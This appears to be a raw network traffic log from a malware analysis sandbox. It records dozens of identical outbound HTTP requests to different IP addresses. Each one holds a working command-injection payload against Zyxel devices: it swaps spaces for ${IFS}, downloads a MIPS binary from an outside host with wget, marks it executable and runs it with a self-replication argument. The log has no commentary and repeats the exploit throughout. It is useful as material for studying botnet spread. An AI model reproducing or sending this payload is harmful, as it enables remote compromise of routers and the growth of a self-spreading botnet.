                                      Jan 19, 2024 17:29:29.708528996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3598192.168.2.144337669.182.243.168443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.708578110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3599192.168.2.144877843.22.236.130443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.708611965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3600192.168.2.144614427.14.50.230443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.708672047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3601192.168.2.144361439.215.89.246443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.708681107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3602192.168.2.1453654102.211.41.231443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.708739042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3603192.168.2.145134014.179.202.128443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.708751917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3604192.168.2.143690663.108.11.134443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.708808899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3605192.168.2.143596836.76.34.122443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.708842993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3606192.168.2.146074238.70.40.149443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.708920956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3607192.168.2.145810497.97.155.124443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.708956957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3608192.168.2.1445840181.246.41.122443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.708992004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3609192.168.2.1437820223.9.164.238443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.709037066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3610192.168.2.1440264145.110.31.221443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.709068060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3611192.168.2.1438682210.176.45.248443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.709103107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3612192.168.2.145669473.190.70.90443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.709142923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3613192.168.2.1456790110.232.242.95443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.709198952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3614192.168.2.144798090.213.102.77443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.709227085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3615192.168.2.145179494.120.212.7443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.709284067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3616192.168.2.1453752218.85.102.6443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.709326029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3617192.168.2.143622248.95.244.103443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.709371090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3618192.168.2.143643812.47.177.162443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.709412098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3619192.168.2.1440144107.192.6.146443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.709471941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3620192.168.2.1452252180.48.208.68443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.709500074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3621192.168.2.145631647.84.91.199443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.709553003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3622192.168.2.1443720107.87.219.248443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.709577084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3623192.168.2.1445724186.157.94.80443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.709619999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3624192.168.2.1458036131.202.160.48443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.709661961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3625192.168.2.1439886173.191.153.19443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.709700108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3626192.168.2.1443822189.78.153.1443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.709726095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3627192.168.2.1450572141.219.246.26443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.709794044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3628192.168.2.144375681.101.3.17443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.709811926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3629192.168.2.1456142114.51.248.54443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.709853888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3630192.168.2.1444954157.28.55.10443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.709880114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3631192.168.2.1459142189.39.125.168443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.709925890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3632192.168.2.144293617.228.190.47443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.709964991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3633192.168.2.1454732180.28.51.173443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.709995985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3634192.168.2.1460656192.236.194.98443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.710050106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3635192.168.2.145572642.42.69.76443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.710081100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3636192.168.2.1458092201.55.117.179443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.710125923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3637192.168.2.1453302107.73.19.192443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.710159063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3638192.168.2.1444080175.45.118.19443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.710212946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3639192.168.2.144871094.108.116.247443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.710239887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3640192.168.2.1436706178.247.166.203443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.710287094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3641192.168.2.1436520158.243.145.117443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.710350037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3642192.168.2.1457594117.208.126.188443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.710386992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3643192.168.2.1459312211.61.249.98443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.710427046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3644192.168.2.1457932195.201.127.227443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.710460901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3645192.168.2.1435072117.128.66.19443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.710495949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3646192.168.2.144983844.240.107.152443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.710551023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3647192.168.2.1433336149.87.175.37443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.710598946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3648192.168.2.143857484.134.85.244443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.710632086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3649192.168.2.1452306179.152.135.88443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.710676908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3650192.168.2.145483052.236.64.161443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.710716963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3651192.168.2.1453268140.115.212.251443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.710762978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3652192.168.2.1440680104.164.152.16443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.710797071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3653192.168.2.1450790120.9.130.203443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.710843086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3654192.168.2.1449638143.63.167.60443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.710870028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3655192.168.2.1448360172.176.250.34443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.710918903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3656192.168.2.1441440107.199.66.33443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.710937023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3657192.168.2.1452454108.98.242.36443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.710974932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3658192.168.2.1442986220.225.159.251443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.710999012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3659192.168.2.1453354150.225.84.92443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.711064100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3660192.168.2.145910624.155.157.180443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.711097956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3661192.168.2.144108090.206.123.180443
                                      TimestampBytes transferredDirectionData
